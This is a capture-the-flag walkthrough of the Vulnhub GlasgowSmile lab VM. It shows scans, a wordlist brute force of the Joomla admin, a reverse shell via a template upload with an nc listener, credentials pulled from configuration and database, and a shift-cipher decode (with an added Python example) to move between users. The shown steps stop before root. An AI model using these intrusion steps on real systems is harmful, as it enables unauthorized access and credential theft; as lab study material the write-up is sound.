GlasgowSmile
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.148 00:0c:29:e1:23:04 1 60 VMware, Inc.
10.1.1.254 00:50:56:ee:66:c6 1 60 VMware, Inc.
Using Netdiscover, which ships with Kali Linux, the target host (MAC 00:0c:29:e1:23:04) is identified as 10.1.1.148.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.148 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 05:54 EST
Nmap scan report for 10.1.1.148
Host is up (0.0063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6734481f250ed7b3eabb361122608fa1 (RSA)
| 256 4c8c4565a484e8b1507777a93a960631 (ECDSA)
|_ 256 09e994236097f720cceed6c19bda188e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E1:23:04 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds
The Nmap scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ls
joker.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ steghide extract -sf joker.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ stegseek joker.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.37% (132.6 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ exiftool joker.jpg
ExifTool Version Number : 12.49
File Name : joker.jpg
Directory : .
File Size : 263 kB
File Modification Date/Time : 2023:02:23 05:56:51-05:00
File Access Date/Time : 2023:02:23 05:57:08-05:00
File Inode Change Date/Time : 2023:02:23 05:56:51-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Image Width : 1920
Image Height : 1080
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1920x1080
Megapixels : 2.1
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ nikto -h http://10.1.1.148
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.148
+ Target Hostname: 10.1.1.148
+ Target Port: 80
+ Start Time: 2023-02-23 08:18:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7d, size: 5a7fbb701d4b6, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7889 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-02-23 08:19:12 (GMT-5) (68 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ gobuster dir -u http://10.1.1.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.1.1.148
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2023/02/23 08:20:30 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 275]
/.html (Status: 403) [Size: 275]
/index.html (Status: 200) [Size: 125]
/joomla (Status: 301) [Size: 309] [--> http://10.1.1.148/joomla/]
/how_to.txt (Status: 200) [Size: 456]
/.html (Status: 403) [Size: 275]
/.php (Status: 403) [Size: 275]
/server-status (Status: 403) [Size: 275]
Progress: 1098668 / 1102805 (99.62%)
===============================================================
2023/02/23 08:22:06 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ curl http://10.1.1.148/how_to.txt
Hi Rob,
Forgive My Laughter. I Have A Condition
Take care
________ ____ __ ___ _____ ______
(___ ___) / __ \ () ) / __) / ___/ ( __ \
) ) / / \ \ ( (_/ / ( (__ ) (__) )
( ( ( () () ) () ( ) __) ( __/
__ ) ) ( () () ) () /\ \ ( ( ) \ \ _
( (_/ / \ \__/ / ( ( \ \ \ \___ ( ( \ \_))
\___/ \____/ ()_) \_\ \____\ )_) \__/
Could Rob be a username?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ dirb http://10.1.1.148
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Feb 23 08:24:09 2023
URL_BASE: http://10.1.1.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.1.1.148/ ----
+ http://10.1.1.148/index.html (CODE:200|SIZE:125)
==> DIRECTORY: http://10.1.1.148/joomla/
+ http://10.1.1.148/server-status (CODE:403|SIZE:275)
---- Entering directory: http://10.1.1.148/joomla/ ----
==> DIRECTORY: http://10.1.1.148/joomla/administrator/
Found the page:
http://10.1.1.148/joomla/administrator/index.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ wfuzz -u http://10.1.1.148/joomla/cli/?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 2
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.1.1.148/joomla/cli/?FUZZ=id
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 0
Nothing useful has come of any of this so far.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ cewl http://10.1.1.148/joomla/ -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood ([email protected]) (https://digi.ninja/)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ wc -l dict.txt
165 dict.txt
Use the password dictionary generated by cewl with Burp Suite Intruder to brute-force the login. Assuming the username is joomla, the password comes out as Gotham; log in to the administrator backend.
Go to Extensions -> Templates -> Templates -> beez3 and upload a reverse shell.
Click template preview.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.148] 53102
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
07:56:21 up 3:06, 0 users, load average: 0.00, 0.05, 0.31
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
www-data@glasgowsmile:/var/www/joomla2$ cat configuration.php
cat configuration.php
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'Joker';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'babyjoker';
public $db = 'joomla_db';
MariaDB [batjoke]> select * from taskforce;
select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type | date | name | pswd |
+----+---------+------------+---------+----------------------------------------------+
| 1 | Soldier | 2020-06-14 | Bane | YmFuZWlzaGVyZQ== |
| 2 | Soldier | 2020-06-14 | Aaron | YWFyb25pc2hlcmU= |
| 3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ== |
| 4 | Soldier | 2020-06-14 | buster | YnVzdGVyaXNoZXJlZmY= |
| 6 | Soldier | 2020-06-14 | rob | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
| 7 | Soldier | 2020-06-14 | aunt | YXVudGlzIHRoZSBmdWNrIGhlcmU= |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.000 sec)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d
???AllIHaveAreNegativeThoughts???
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'YmFuZWlzaGVyZQ==' | base64 -d
baneishere
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ssh [email protected]
The authenticity of host '10.1.1.148 (10.1.1.148)' can't be established.
ED25519 key fingerprint is SHA256:bVGopxZOACv+Dy/jm+EmAyAQm+YSDTmVK1pVrNUz+P8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.148' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$ id
uid=1000(rob) gid=1000(rob) groups=1000(rob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
rob@glasgowsmile:~$
Privilege escalation
Decode it with CyberChef. The encoding is a ROT13-style shift; running ROT13 Brute Force first shows amount=1, and the decode then succeeds:
Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
This gives abner's password.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0
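The shift-cipher brute force that CyberChef performs above, reimplemented as an added example that is not from the original post: it tries all 26 shifts on the opening of rob's Abnerineedyourhelp note, scores each candidate by common English words, then undoes the same shift on the trailing token before base64-decoding it, the same base64 step used on the taskforce table earlier. The word list and the scoring heuristic are assumptions of this example.

```python
import base64
import string

# Opening words of the encoded note in rob's home directory, and the shifted
# base64 token at its end (both taken from the post; nothing else is needed).
CIPHERTEXT = "Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr"
TOKEN = "RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ=="

# Small assumed list of frequent English words; enough to rank candidate shifts.
COMMON_WORDS = {"the", "a", "and", "of", "to", "is", "his", "but", "we", "for",
                "hello", "dear", "from", "see", "you", "can", "in"}

def rotate(text, amount):
    """Shift every ASCII letter forward by `amount`, leaving everything else alone.
    amount=13 is ROT13; the note on this box uses amount=1."""
    lower, upper = string.ascii_lowercase, string.ascii_uppercase
    k = amount % 26
    table = str.maketrans(lower + upper,
                          lower[k:] + lower[:k] + upper[k:] + upper[:k])
    return text.translate(table)

def score(text):
    """Count how many whitespace-separated words are in the common-word list."""
    words = [w.strip(".,\"'?!").lower() for w in text.split()]
    return sum(1 for w in words if w in COMMON_WORDS)

def best_shift(ciphertext):
    """Try all 26 shifts and return (amount, plaintext) with the highest score."""
    candidates = ((a, rotate(ciphertext, a)) for a in range(26))
    return max(candidates, key=lambda pair: score(pair[1]))

def recover_password(token, amount):
    """Undo the letter shift on the base64 token, then base64-decode it."""
    return base64.b64decode(rotate(token, amount)).decode()
```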
rob@glasgowsmile:~$ ls -alh
total 52K
drwxr-xr-x 3 rob rob 4.0K Jun 16 2020 .
drwxr-xr-x 5 root root 4.0K Jun 15 2020 ..
-rw-r----- 1 rob rob 454 Jun 14 2020 Abnerineedyourhelp
-rw------- 1 rob rob 7 Feb 23 04:50 .bash_history
-rw-r--r-- 1 rob rob 220 Jun 13 2020 .bash_logout
-rw-r--r-- 1 rob rob 3.5K Jun 13 2020 .bashrc
-rw-r----- 1 rob rob 313 Jun 14 2020 howtoberoot
drwxr-xr-x 3 rob rob 4.0K Jun 13 2020 .local
-rw------- 1 rob rob 81 Jun 15 2020 .mysql_history
-rw-r--r-- 1 rob rob 807 Jun 13 2020 .profile
-rw-r--r-- 1 rob rob 66 Jun 15 2020 .selected_editor
-rw-r----- 1 rob rob 38 Jun 13 2020 user.txt
-rw------- 1 rob rob 429 Jun 16 2020 .Xauthority
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
rob@glasgowsmile:~$
rob@glasgowsmile:~$ su - aber
su: user aber does not exist
rob@glasgowsmile:~$ su - abner
Password:
abner@glasgowsmile:~$ id
uid=1001(abner) gid=1001(abner) groups=1001(abner)
abner@glasgowsmile:~$ sudo -l
-bash: sudo: command not found
abner@glasgowsmile:~$ ls -alh
total 44K
drwxr-xr-x 4 abner abner 4.0K Jun 16 2020 .
drwxr-xr-x 5 root root 4.0K Jun 15 2020 ..
-rw------- 1 abner abner 167 Feb 23 04:50 .bash_history
-rw-r--r-- 1 abner abner 220 Jun 14 2020 .bash_logout
-rw-r--r-- 1 abner abner 3.5K Jun 14 2020 .bashrc
-rw-r----- 1 abner abner 565 Jun 16 2020 info.txt
drwxr-xr-x 3 abner abner 4.0K Jun 14 2020 .local
-rw-r--r-- 1 abner abner 807 Jun 14 2020 .profile
drwx------ 2 abner abner 4.0K Jun 15 2020 .ssh
-rw-r----- 1 abner abner 38 Jun 16 2020 user2.txt
-rw------- 1 abner abner 399 Jun 15 2020 .Xauthority
abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
abner@glasgowsmile:~$ cat info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").
Logged in as abner successfully. Tried a number of privilege-escalation techniques, but none were exploitable. There is also a penguin directory in /home that cannot be opened, but the command history shows that a .dear_penguins.zip was extracted.
Source: https://www.cnblogs.com/jason-huawen/p/17149688.html